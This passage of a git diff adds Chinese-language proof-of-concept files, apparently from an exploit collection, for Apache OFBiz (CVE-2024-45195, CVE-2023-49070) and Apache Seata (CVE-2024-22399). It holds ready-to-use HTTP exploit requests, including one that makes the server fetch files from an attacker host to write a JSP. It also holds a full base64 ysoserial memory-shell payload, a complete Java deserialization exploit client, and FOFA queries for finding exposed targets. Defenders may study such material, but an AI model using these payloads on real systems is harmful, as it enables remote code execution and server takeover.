u0076\u0041\u0044\u0055\u0041\u0063\u0051\u0042\u0030\u0041\u0043\u0038\u0041\u0065\u0051\u0043\u006d\u0041\u004b\u006b\u0041\u004c\u0077\u0041\u0042\u0041\u004a\u0051\u0041\u0041\u0041\u0042\u0047\u0041\u0042\u0045\u0041\u0041\u0041\u0044\u0039\u0041\u0041\u0049\u0041\u002f\u0077\u0041\u0049\u0041\u0051\u0041\u0041\u004c\u0051\u0045\u0044\u0041\u0044\u0041\u0042\u0041\u0051\u0041\u0078\u0041\u0051\u0051\u0041\u004e\u0051\u0045\u0047\u0041\u0045\u0077\u0042\u0042\u0077\u0042\u0078\u0041\u0051\u006f\u0041\u0064\u0041\u0045\u0049\u0041\u0048\u0055\u0042\u0044\u0041\u0042\u0035\u0041\u0051\u0034\u0041\u0066\u0077\u0045\u0050\u0041\u0049\u0038\u0042\u0045\u0041\u0043\u006d\u0041\u0052\u004d\u0041\u0071\u0051\u0045\u0052\u0041\u004b\u006f\u0042\u0046\u0051\u0041\u0042\u0041\u004b\u0055\u0041\u0041\u0041\u0041\u0043\u0041\u004b\u0059\u003d\u005c\u0022\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0063\u006f\u0064\u0065\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0022\u0029\u003b
+
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains_all(body,"{{randstr}}")
+```
+
+## 漏洞来源
+- https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/
+- https://mp.weixin.qq.com/s/A0pwnvbJ44mlm3E1JoFVBA
+  
diff --git a/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md b/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md
new file mode 100644
index 0000000..cb273b3
--- /dev/null
+++ b/Apache-OFBiz远程代码执行漏洞(CVE-2024-45195).md
@@ -0,0 +1,48 @@
+# Apache-OFBiz远程代码执行漏洞(CVE-2024-45195)
+
+Apache OFBiz 远程代码执行漏洞(CVE-2024-45195)，该漏洞允许未经身份验证的远程攻击者通过SSRF漏洞控制请求从而写入恶意文件。攻击者可能利用该漏洞来执行恶意操作，包括但不限于获取敏感信息、修改数据或执行系统命令，最终可导致服务器失陷。
+
+## fofa
+
+```yaml
+app="Apache_OFBiz"
+```
+
+## poc
+
+```javascript
+POST /webtools/control/forgotPassword/viewdatafile HTTP/2
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+ 
+DATAFILE_LOCATION=http://vpsip:5000/rcereport.csv&DATAFILE_SAVE=./applications/accounting/webapp/accounting/index.jsp&DATAFILE_IS_URL=true&DEFINITION_LOCATION=http://vpsip:5000/rceschema.xml&DEFINITION_IS_URL=true&DEFINITION_NAME=rce
+```
+
+### rcereport.csv
+
+```xml-dtd
+<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+        <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
+            <record name="rceentry" limit="many">
+                <field name="jsp" type="String" length="605" position="0"></field>
+            </record>
+        </data-file>
+</data-files>
+```
+
+### rceschema.xml
+
+```xml
+<data-files xsi:noNamespaceSchemaLocation="http://ofbiz.apache.org/dtds/datafiles.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+        <data-file name="rce" separator-style="fixed-length" type-code="text" start-line="0" encoding-type="UTF-8">
+            <record name="rceentry" limit="many">
+                <field name="jsp" type="String" length="605" position="0"></field>
+            </record>
+        </data-file>
+</data-files>
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081931358.png)
\ No newline at end of file
diff --git a/Apache-Ofbiz-XML-RPC-RCE漏洞-CVE-2023-49070.md b/Apache-Ofbiz-XML-RPC-RCE漏洞-CVE-2023-49070.md
new file mode 100644
index 0000000..1c133cd
--- /dev/null
+++ b/Apache-Ofbiz-XML-RPC-RCE漏洞-CVE-2023-49070.md
@@ -0,0 +1,62 @@
+## Apache Ofbiz XML-RPC RCE漏洞-CVE-2023-49070
+2020年，为修复 CVE-2020-9496 增加权限校验，存在绕过。2021年，增加 Filter 用于拦截 XMLRPC 中的恶意请求，存在绕过。2023年四月，彻底删除xmlrpc handler 以避免同类型的漏洞产生尽管主分支在四月份已经移除了XML-RPC组件，但在Apache OFBiz的正式发布版本中，仅最新版本18.12.10彻底废除了XML-RPC功能。
+
+流量分析: 攻击者利用这个漏洞时，会发送包含用户名和密码的 HTTP 请求到 XML-RPC 接口。在网络流量中，这可能表现为对 /webtools/control/xmlrpc 的异常访问请求。
+
+异常请求内容: 利用 Filter 绕过机制的请求可能包含不寻常的 URI 结构，如使用分号或路径穿越技术(./)。
+
+特定的错误日志: 在尝试进行反序列化攻击时，可能会在日志中观察到相关错误或异常信息，尤其是与XML-RPC 组件相关的。
+
+## fofa
+```
+app="Apache_OFBiz"
+```
+
+## poc
+```
+POST /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
+Host: ip:port
+Sec-Ch-Ua: "Not=A?Brand";v="99", "Chromium";v="118"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+cmd:ifconfig
+Content-Length: 8906
+
+<?xml version="1.0"?>
+<methodCall>
+  <methodName>RCE</methodName>
+  <params>
+    <param>
+      <value>
+        <struct>
+          <member>
+            <name>RCE</name>
+            <value>
+              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">   rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK3K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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
+              </serializable>
+            </value>
+          </member>
+        </struct>
+      </value>
+    </param>
+  </params>
+</methodCall>
+```
+## 回显内存马
+```
+java -jar ysoserial-main-49888d3191-1.jar CommonsBeanutils192NOCC "CLASS:TomcatCmdEcho" | base64 | tr -d "\n"
+```
+![6258c158de059f1edbe8c4026ee65ba8](https://github.com/wy876/POC/assets/139549762/63d1d7ae-dbe6-4bc9-8a9d-830d5bea5e9e)
+
+![c13860bff93338c758f4d8cca201939e](https://github.com/wy876/POC/assets/139549762/274af3d0-81b1-4c01-83c5-3fbb631e4ed4)
+
diff --git a/Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md b/Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md
new file mode 100644
index 0000000..08aaee2
--- /dev/null
+++ b/Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399).md
@@ -0,0 +1,180 @@
+# Apache-Seata存在Hessian反序列化漏洞(CVE-2024-22399)
+
+Apache Seata(incubating) 是一款开源的分布式事务解决方案，用于在微服务架构下提供高性能和简单易用的分布式事务服务。
+
+Seata用于服务端与客户端通信的RPC协议（默认8091端口）以及2.0.0开始实现的Raft协议消息均支持hessian格式，在2.1.0及1.8.1版本之前的Hessian反序列化操作校验不严格，自身安全校验HessianSerializerFactory只作用于serialize序列化过程。
+
+攻击者可通过向Seata服务端发送恶意的hessian格式RPC数据，通过SwingLazyValue等利用链反序列化执行任意代码。
+
+## poc
+
+```java
+package org.example;
+
+import com.caucho.hessian.io.Hessian2Output;
+import com.caucho.hessian.io.SerializerFactory;
+import io.netty.bootstrap.Bootstrap;
+import io.netty.buffer.ByteBuf;
+import io.netty.channel.ChannelFuture;
+import io.netty.channel.ChannelHandlerContext;
+import io.netty.channel.ChannelInitializer;
+import io.netty.channel.EventLoopGroup;
+import io.netty.channel.nio.NioEventLoopGroup;
+import io.netty.channel.socket.SocketChannel;
+import io.netty.channel.socket.nio.NioSocketChannel;
+import io.netty.handler.codec.MessageToByteEncoder;
+import io.netty.channel.ChannelInboundHandlerAdapter;
+import io.seata.core.protocol.RpcMessage;
+import io.seata.core.compressor.Compressor;
+import io.seata.core.compressor.CompressorFactory;
+import io.seata.core.rpc.netty.v1.HeadMapSerializer;
+import io.seata.serializer.hessian.HessianSerializerFactory;
+import sun.swing.SwingLazyValue;
+
+import javax.activation.MimeTypeParameterList;
+import javax.swing.*;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.lang.reflect.Method;
+import java.util.Map;
+
+import static io.seata.common.util.ReflectionUtil.setFieldValue;
+
+public class SeataPoc {
+    public SeataPoc() {
+    }
+
+    public void SendPoc(String host,int port) throws InterruptedException {
+        EventLoopGroup group = new NioEventLoopGroup();
+        try {
+            Bootstrap bootstrap = new Bootstrap();
+            bootstrap.group(group)
+                    .channel(NioSocketChannel.class)
+                    .handler(new ChannelInitializer<SocketChannel>() {
+                        @Override
+                        protected void initChannel(SocketChannel ch) {
+                            ch.pipeline().addLast(new HessianEncoder());
+                            ch.pipeline().addLast(new SendPocHandler());
+                        }
+                    });
+            // 连接到服务器
+            ChannelFuture future = bootstrap.connect(host, port).sync();
+            // 等待连接关闭
+            future.channel().closeFuture().sync();
+        } finally {
+            group.shutdownGracefully();
+        }
+    }
+
+    private class HessianEncoder extends MessageToByteEncoder {
+        public HessianEncoder() {
+        }
+
+        public void encode(ChannelHandlerContext ctx, Object msg, ByteBuf out) {
+            try {
+                if (!(msg instanceof RpcMessage)) {
+                    throw new UnsupportedOperationException("Not support this class:" + msg.getClass());
+                }
+
+                RpcMessage rpcMessage = (RpcMessage)msg;
+                int fullLength = 16;
+                int headLength = 16;
+                byte messageType = rpcMessage.getMessageType();
+                out.writeBytes(new byte[]{-38, -38});
+                out.writeByte(1);
+                out.writerIndex(out.writerIndex() + 6);
+                out.writeByte(messageType);
+                out.writeByte(rpcMessage.getCodec());
+                out.writeByte(rpcMessage.getCompressor());
+                out.writeInt(rpcMessage.getId());
+                Map<String, String> headMap = rpcMessage.getHeadMap();
+                if (headMap != null && !headMap.isEmpty()) {
+                    int headMapBytesLength = HeadMapSerializer.getInstance().encode(headMap, out);
+                    headLength += headMapBytesLength;
+                    fullLength += headMapBytesLength;
+                }
+
+                byte[] bodyBytes = null;
+                if (messageType != 3 && messageType != 4) {
+
+                    SerializerFactory hessian = HessianSerializerFactory.getInstance();
+                    hessian.setAllowNonSerializable(true);
+                    byte[] stream = null;
+                    try {
+                        com.caucho.hessian.io.Serializer serializer1 = hessian.getSerializer(rpcMessage.getBody().getClass());
+                        ByteArrayOutputStream baos = new ByteArrayOutputStream();
+                        Hessian2Output output = new Hessian2Output(baos);
+                        output.getSerializerFactory().setAllowNonSerializable(true);
+                        serializer1.writeObject(rpcMessage.getBody(), output);
+                        output.close();
+                        stream = baos.toByteArray();
+                    } catch (IOException var7) {
+                        System.out.println(var7);
+                    }
+
+                    bodyBytes = stream;
+
+                    Compressor compressor = CompressorFactory.getCompressor(rpcMessage.getCompressor());
+                    bodyBytes = compressor.compress(bodyBytes);
+                    fullLength += bodyBytes.length;
+                }
+
+                if (bodyBytes != null) {
+                    out.writeBytes(bodyBytes);
+                }
+
+                int writeIndex = out.writerIndex();
+                out.writerIndex(writeIndex - fullLength + 3);
+                out.writeInt(fullLength);
+                out.writeShort(headLength);
+                out.writerIndex(writeIndex);
+            } catch (Throwable var12) {
+                System.out.println(var12);
+            }
+
+        }
+    }
+
+    private class SendPocHandler extends ChannelInboundHandlerAdapter {
+        @Override
+        public void channelActive(ChannelHandlerContext ctx) throws Exception{
+            // 连接成功时发送消息
+            RpcMessage rpcMessage = new RpcMessage();
+            rpcMessage.setCodec((byte) 22);
+            // evil Object
+            rpcMessage.setBody(GenObject("touch /tmp/123"));
+            ctx.writeAndFlush(rpcMessage);
+        }
+
+        public Object GenObject(String cmd) throws Exception{
+            UIDefaults uiDefaults = new UIDefaults();
+            Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class);
+            Method exec = Class.forName("java.lang.Runtime").getDeclaredMethod("exec", String.class);
+
+            SwingLazyValue slz = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{cmd}}});
+
+            uiDefaults.put("xxx", slz);
+            MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList();
+
+            setFieldValue(mimeTypeParameterList,"parameters",uiDefaults);
+
+            return mimeTypeParameterList;
+
+        }
+
+    }
+
+    public static void main(String[] args) throws Exception{
+        SeataPoc seataPoc = new SeataPoc();
+        seataPoc.SendPoc("127.0.0.1", 8091);
+
+    }
+
+}
+```
+
+![image-20240920111854721](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409201118874.png)
+
+## 漏洞来源
+
